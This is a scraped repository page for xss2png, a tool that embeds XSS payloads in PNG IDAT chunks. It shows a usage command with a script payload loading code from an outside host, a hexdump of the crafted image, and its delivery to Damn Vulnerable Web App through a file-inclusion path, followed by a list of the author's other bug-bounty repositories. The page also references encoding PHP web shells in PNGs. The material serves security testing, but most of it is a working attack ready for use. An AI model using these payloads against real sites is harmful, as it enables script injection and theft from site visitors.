• Stars
    star
    166
  • Rank 227,748 (Top 5 %)
  • Language
    Python
  • License
    MIT License
  • Created over 5 years ago
  • Updated about 2 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

PNG IDAT chunks XSS payload generator

xss2png

A simple tool to generate PNG images with XSS payloads stored in PNG IDAT chunks

Huge thanks to Nathaniel McHugh for sharing his PHP source code with me

Usage

~/$ python3 xss2png.py -p "<SCRIPT SRC=//XSS.VAVKAMIL.CZ></SCRIPT>" -o xss.png
               ____                    
 __  _____ ___|___ \ _ __  _ __   __ _ 
 \ \/ / __/ __| __) | '_ \| '_ \ / _` |
  >  <\__ \__ \/ __/| |_) | | | | (_| |
 /_/\_\___/___/_____| .__/|_| |_|\__, |
                    |_|          |___/
 PNG IDAT chunks XSS payload generator

[i] Using payload: <SCRIPT SRC=//XSS.VAVKAMIL.CZ></SCRIPT>

[i] Generating final PNG output
[!] PNG output saved as: xss.png

Example

~/$ hexdump -C xss.png 
00000000  89 50 4e 47 0d 0a 1a 0a  00 00 00 0d 49 48 44 52  |.PNG........IHDR|
00000010  00 00 00 20 00 00 00 20  08 02 00 00 00 fc 18 ed  |... ... ........|
00000020  a3 00 00 00 79 49 44 41  54 78 9c 63 fc 3c 53 43  |....yIDATx.c.<SC|
00000030  52 49 50 54 20 53 52 43  3d 2f 2f 58 53 53 2e 56  |RIPT SRC=//XSS.V|
00000040  41 56 4b 41 4d 49 4c 2e  43 5a 3e 3c 2f 53 43 52  |AVKAMIL.CZ></SCR|
00000050  49 50 54 3e 20 a0 ff ba  e3 fc ab 7f cf dc 0c 7b  |IPT> ..........{|
00000060  c5 f2 d2 cb 43 f1 c1 fd  db 2a cf df de ff fc ff  |....C....*......|
00000070  f9 87 1f 56 7f ff f2 04  7a 5c bf 72 f7 ca b3 37  |...V....z\.r...7|
00000080  9a 7a 6b 3b fb 18 19 19  46 c1 28 18 05 a3 60 14  |.zk;....F.(...`.|
00000090  8c 82 51 30 0a 46 c1 28  18 05 43 0e 00 00 1b 22  |..Q0.F.(..C...."|
000000a0  26 02 5b 4d 02 76 00 00  00 00 49 45 4e 44 ae 42  |&.[M.v....IEND.B|
000000b0  60 82                                             |`.|
000000b2

Damn Vulnerable Web App

http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/xss.png

HTTP/1.1 200 OK
Date: Fri, 23 Aug 2019 00:13:37 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 3422
Connection: close

�PNG
�

IHDR  ������yIDATx�c�<SCRIPT SRC=\\XSS.VAVKAMIL.CZ></SCRIPT> ������=s3���K��_s������?��_�X1��	��~���go4��v�322��Q0
F�(���`���Q0
��4�%���۠IEND�B`�
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

Can be also useful for example with PHP payload on Hackerone CTF TempImage challenge

Credits

fin1te
Adam Logue
huntergregal
IDontPlayDarts
Masato Kinugawa
Nathaniel McHugh

Relevant posts

06-2012 Encoding Web Shells in PNG IDAT chunks

11-2015 Bug-hunter's Sorrow

01-2016 An XSS on Facebook via PNGs & Wonky Content Types

03-2016 Revisiting XSS payloads in PNG IDAT chunks

10-2022 Persistent PHP payloads in PNGs: How to inject PHP code in an image – and keep it there !

Other tools

PNG-IDAT-chunks

PNG-IDAT-Payload-Generator

pixload

Stack Overflow

PHP shell on PNG's IDAT Chunk

More Repositories

1

awesome-bugbounty-tools

A curated list of various bug bounty tools
4,081
star
2

awesome-vulnerable-apps

Awesome Vulnerable Applications
974
star
3

dvwp

Damn Vulnerable WordPress
PHP
159
star
4

XFFenum

X-Forwarded-For [403 forbidden] enumeration
Python
88
star
5

wp-update-confusion

WordPress Plugin Update Confusion
Python
66
star
6

dkimsc4n

Asynchronous wordlist based DKIM scanner
Python
54
star
7

XSSwagger

A simple Swagger-ui scanner that can detect old versions vulnerable to various XSS attacks
Python
53
star
8

bugbountytip.com

Flask powered website to display tweets with a hashtag #bugbountytip
HTML
16
star
9

BBClip

Bug Bounty Clipboard
JavaScript
16
star
10

h1_2_nuclei

Scan any HackerOne program with Nuclei
Python
10
star
11

wp2burp

Intercept WordPress requests with Burp Suite
Shell
9
star
12

old-repos-backup

Back-up of my old unmaintained GitHub repositories
Perl
8
star
13

SpyPortal

Sniffing & geolocating saved SSIDs
Python
7
star
14

XSSworm.dev

Self-replication contest
CSS
6
star
15

web-security-notify

Telegram bot to notify about new Web Security Academy labs
Python
5
star
16

bb_tldr_bot

tldr; bot for r/bugbounty
Python
4
star
17

openvpn_proton

OpenVPN / ProtonVPN
Python
4
star
18

API-Keys-Snitch

Burp extension to detect & report exposed API keys as an Informative issue
Python
4
star
19

xml-rpc-settings

Configure XML-RPC methods to increase the security of your website
PHP
4
star
20

dvnc

Damn Vulnerable Nginx Config
Dockerfile
3
star
21

vavkamil

https://news.ycombinator.com/item?id=23807881
2
star
22

r-bugbounty-automod

reddit.com/r/bugbounty AutoModerator config
2
star
23

vavkamil.cz

My personal blog
HTML
2
star
24

securitytxt.cz

https://securitytxt.cz/
TSQL
1
star